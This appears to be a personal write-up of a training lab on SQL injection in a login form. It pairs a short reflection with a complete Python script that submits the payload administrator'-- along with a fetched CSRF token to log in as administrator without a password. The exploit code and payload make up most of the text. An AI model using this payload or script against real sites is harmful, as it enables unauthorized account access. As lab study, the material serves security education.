This lab showed how a basic SQL injection vulnerability in a login form can be used to bypass authentication. By injecting a crafted input into the username field, I was able to manipulate the backend SQL query and log in as the administrator user — without knowing the password. It was a powerful reminder of how dangerous it is to construct SQL queries directly from user input.
[+] Start Burp Suite before running the script — it uses a proxy for visibility.
[+] The login form input is vulnerable to SQL injection.
[+] A crafted username like administrator'-- bypasses password validation.
[+] The server logs you in as administrator without needing the correct password.
[+] CSRF token is fetched dynamically to submit a valid request.
[+] Login success is confirmed when the error message is not shown.
python3 exploit.py https://<your-lab-id>.web-security-academy.net
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def get_csrf_token(s, url):
uri = "/login"
r = s.get(url + uri , verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, 'html.parser')
csrf = soup.find("input") ['value']
return csrf
def exploit_sqli(s, url, payload):
csrf = get_csrf_token(s, url)
data = {"csrf": csrf,
"username": payload,
"password": payload}
uri = "/login"
r = s.post(url + uri, data=data, verify=False, proxies=proxies)
res = r.text
if "Invalid username or password." in res:
return False
else:
return True
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
sqli_payload = "administrator'--"
except IndexError:
print("[-] Usage: %s <url>" %sys.argv[0])
print('[-] Example: %s www.example.com' %sys.argv[0])
s = requests.Session()
if exploit_sqli(s, url, sqli_payload):
print("[+] SQL injection successful! We have logged in as the administrator user.")
else:
print("[-] SQL injection unsuccessful.")